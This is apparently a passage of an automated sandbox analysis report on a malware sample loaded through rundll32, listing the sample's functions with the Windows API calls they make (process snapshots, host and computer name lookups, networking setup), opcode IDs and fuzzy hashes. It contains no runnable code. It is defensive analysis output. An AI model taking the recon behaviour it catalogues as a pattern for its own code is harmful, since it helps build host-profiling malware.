                    • Instruction Fuzzy Hash: AF31BF31B10256EFDB10DF64D8C59AE7BB6AF01310F0986ECF4568B190E331E9A1DB51
                    APIs
                    • _memset.LIBCMT ref: 04173FD3
                    • lstrcatA.KERNEL32(041A8238,0417BCE4,?,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 0417406B
                      • Part of subcall function 041734F0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,041A6A00,00000000,?,?,04173FFE), ref: 04173501
                    • lstrcatA.KERNEL32(041A8238,0417BC04,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 04174017
                    • lstrcatA.KERNEL32(041A8238,0417B7B4,?,00000000,00000000,?,04174334,00000000,?,?,?,?,?,?,762323A0), ref: 04174023
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: lstrcat$CreateSnapshotToolhelp32_memset
                    • String ID:
                    • API String ID: 2821338896-0
                    • Opcode ID: 30d1913c5fa55ad8e92bb9c5a846b3c7d8bf47c5e918474cda198133c9d23d72
                    • Instruction ID: 4fb298e0ae8d33c0de8edd82919f7feeab6522397a34d7c17ef867572a404719
                    • Opcode Fuzzy Hash: 30d1913c5fa55ad8e92bb9c5a846b3c7d8bf47c5e918474cda198133c9d23d72
                    • Instruction Fuzzy Hash: 0A112B79B4030567FA106BA95CC6E673378DB8179CF094055FD4AA7101EB70F834CBA1
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 041774B1
                    • InitializeCriticalSection.KERNEL32(?), ref: 041774BE
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 041774C9
                    • __time64.LIBCMT ref: 041774EC
                      • Part of subcall function 041627AA: GetSystemTimeAsFileTime.KERNEL32(041749EE,?,?,?,041749EE,?), ref: 041627B5
                      • Part of subcall function 041627AA: __aulldiv.LIBCMT ref: 041627D5
                      • Part of subcall function 04162777: __getptd.LIBCMT ref: 0416277C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
                    • String ID:
                    • API String ID: 2538592855-0
                    • Opcode ID: 6e702ef2b39ac16988d525f64c5c8c28526309ff00ef902e5e49bc3fcddaa1bb
                    • Instruction ID: fbd21a0b46e4c18b5251cae550b83e1c19e158344c32f0f6ee309a9cfa100d87
                    • Opcode Fuzzy Hash: 6e702ef2b39ac16988d525f64c5c8c28526309ff00ef902e5e49bc3fcddaa1bb
                    • Instruction Fuzzy Hash: 7F1128B0900B049FD320DF7A89C4A96FBF8FB08304F404A6EA59F83641D734B5488F51
                    APIs
                    • __getptd.LIBCMT ref: 04189DCB
                      • Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
                      • Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0
                    • __amsg_exit.LIBCMT ref: 04189DEB
                    • __lock.LIBCMT ref: 04189DFB
                    • _free.LIBCMT ref: 04189E2B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3170801528-0
                    • Opcode ID: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
                    • Instruction ID: 6a5440d8ece5574f9928549cfe99240652c25b066613e62cb82e436cd316007c
                    • Opcode Fuzzy Hash: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
                    • Instruction Fuzzy Hash: 3D01C0B1E10636EBEB21BB6888C476EBBA0BF00714F04415DE804A7280CB34B942DFC5
                    APIs
                    • _malloc.LIBCMT ref: 04181EC0
                      • Part of subcall function 04182C06: __FF_MSGBANNER.LIBCMT ref: 04182C1F
                      • Part of subcall function 04182C06: __NMSG_WRITE.LIBCMT ref: 04182C26
                    • std::exception::exception.LIBCMT ref: 04181EF5
                    • std::exception::exception.LIBCMT ref: 04181F0F
                    • __CxxThrowException@8.LIBCMT ref: 04181F20
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8Throw_malloc
                    • String ID:
                    • API String ID: 2388904642-0
                    • Opcode ID: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
                    • Instruction ID: 33ab5867acc5f7a28316ff5a4bc5b45ab4b552b08465cd1c928901348bf6a995
                    • Opcode Fuzzy Hash: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
                    • Instruction Fuzzy Hash: E3F0D176A00219BAEB16FB54CCC4AAE3BB9FF00608F44055CDD15AA091CB75EB428E52
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04173738
                    • CreateThread.KERNEL32(00000000,00000000,Function_00013690,?,00000000,00000000), ref: 04173752
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04173760
                    • CloseHandle.KERNEL32(?), ref: 0417376A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: 96a8b86c2c3b6e578259b07a2f94d062fbf2640e0b2f1d91fdc3d0ea0d38b293
                    • Instruction ID: f7761d9e1c089e7f54207cbc0a57ccd5a829c45f4a391733d1a6359dd3692ee9
                    • Opcode Fuzzy Hash: 96a8b86c2c3b6e578259b07a2f94d062fbf2640e0b2f1d91fdc3d0ea0d38b293
                    • Instruction Fuzzy Hash: F2F0B4B5E94318BBE710DBA49C4AF9E7B78EB04B10F200255FA14A73C0D6B46A048BD4
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04161584
                    • std::_Xinvalid_argument.LIBCPMT ref: 0416159F
                      • Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161758
                      • Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161776
                      • Part of subcall function 04161740: std::_Xinvalid_argument.LIBCPMT ref: 04161791
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_
                    • String ID: string too long
                    • API String ID: 909987262-2556327735
                    • Opcode ID: 9e68f22dae44218886d4e86725cd8febdda5f1cfc95d43b88028fe551f175dc2
                    • Instruction ID: 04474335428d9332bdf5bf717db1b8ef1b6315e5c84ba26580dd46f669ed0444
                    • Opcode Fuzzy Hash: 9e68f22dae44218886d4e86725cd8febdda5f1cfc95d43b88028fe551f175dc2
                    • Instruction Fuzzy Hash: 2231CB72304210ABD724DD6CE8D09AAF7EADF92754B104A2AF153CB640D771F8618794
                    APIs
                      • Part of subcall function 04191832: __getptd.LIBCMT ref: 04191838
                      • Part of subcall function 04191832: __getptd.LIBCMT ref: 04191848
                    • __getptd.LIBCMT ref: 04191D5C
                      • Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
                      • Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0
                    • __getptd.LIBCMT ref: 04191D6A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
                    • Instruction ID: dc3b6ca88464517979e6e06ee1400a353fdb8ab9f513669b03acabe9ca82f91b
                    • Opcode Fuzzy Hash: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
                    • Instruction Fuzzy Hash: 34014B38901206ABEF34EF64C4C86ADB7F6AF01311F6C48ADD445A66A0CB31ADC1DF41
                    APIs
                      • Part of subcall function 0417242A: __getptd.LIBCMT ref: 04172430
                      • Part of subcall function 0417242A: __getptd.LIBCMT ref: 04172440
                    • __getptd.LIBCMT ref: 04172954
                      • Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
                      • Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848
                    • __getptd.LIBCMT ref: 04172962
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
                    • Instruction ID: c685cf88fd16c2b87920e712db83522f1eb458ff494ec6b8bbff523f688c4b07
                    • Opcode Fuzzy Hash: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
                    • Instruction Fuzzy Hash: 8E016D35800215CADF369F61E4C07ADB7B6BF00211F9844EED88A96651CB30E593CB41
                    APIs
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
                      • Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
                      • Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
                      • Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
                      • Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB
                    • gethostname.WS2_32(?,00000032), ref: 04173FA3
                    • _strncpy.LIBCMT ref: 04173FAF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
                    • String ID: Remark
                    • API String ID: 3464725772-3865500943
                    • Opcode ID: 7714560e256ef32715f851c3273dc7281359c03dae87c11c0c9a0392e7cc3348
                    • Instruction ID: 967be8e81c2910f374d4b97b61e62d72a0ce190bd5f34208fe2cd45509060371
                    • Opcode Fuzzy Hash: 7714560e256ef32715f851c3273dc7281359c03dae87c11c0c9a0392e7cc3348
                    • Instruction Fuzzy Hash: 1AE0CD2694811C2BAB153965ACD98B77B3DCB435ADB0002DDFD0D97601EF073D1A92D3